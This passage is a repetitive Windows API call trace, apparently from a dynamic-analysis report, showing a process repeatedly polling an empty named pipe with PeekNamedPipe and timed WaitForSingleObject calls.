lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0080.285] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0080.316] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0080.316] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0080.348] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0080.348] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0080.379] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0080.379] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0080.410] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0080.410] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0080.441] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0080.441] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0080.472] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0080.472] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0081.954] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0081.954] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0081.986] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0081.994] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0082.415] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0082.415] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0082.438] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0082.438] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0082.470] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0082.470] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0083.890] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0083.890] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0083.983] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0083.983] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0084.054] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0084.054] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0084.098] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0084.098] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0084.125] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0084.504] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0084.531] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0084.531] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0084.560] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0084.560] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0084.613] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0084.613] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0084.646] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0084.647] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0085.766] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0085.766] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0085.941] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0086.072] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0086.088] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0086.089] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0086.119] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0086.120] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0086.151] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0086.151] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0086.183] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0086.183] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0086.581] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0086.582] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0086.603] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0086.603] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0086.638] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0086.638] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0086.666] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0086.666] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0086.697] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0086.697] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0086.729] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0086.729] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0086.759] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0086.759] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0088.293] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0088.293] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0088.330] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0088.330] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0088.350] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0088.351] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0088.382] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0088.383] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0088.423] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0088.423] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0088.854] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0088.854] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0088.888] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0088.888] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0088.914] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0088.914] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0088.943] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0088.943] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0088.974] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0088.974] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0089.006] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0089.006] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0089.037] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0089.037] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0089.068] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0089.069] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0089.099] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0089.099] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0089.142] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0089.142] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0089.161] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0089.162] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0089.193] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0089.193] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0089.224] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0089.224] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0089.256] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0089.256] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0089.286] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0089.286] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0089.317] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0089.318] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0089.349] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0089.349] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0089.380] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0089.380] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0089.411] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0089.411] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0090.708] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0090.885] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0091.354] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0091.354] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0091.379] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0091.379] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0091.428] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0091.428] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0091.456] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0091.456] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0092.942] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0092.942] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0093.378] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0093.378] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0093.405] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0093.405] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0093.436] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0093.437] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0093.469] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0093.469] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0093.498] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, lpBytesLeftThisMessage=0x0 | out: lpBuffer=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898*=0x0, lpBytesLeftThisMessage=0x0) returned 1 [0093.498] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x14) returned 0x102 [0093.529] PeekNamedPipe (in: hNamedPipe=0x128, lpBuffer=0x0, nBufferSize=0x0, lpBytesRead=0x0, lpTotalBytesAvail=0x71f898, 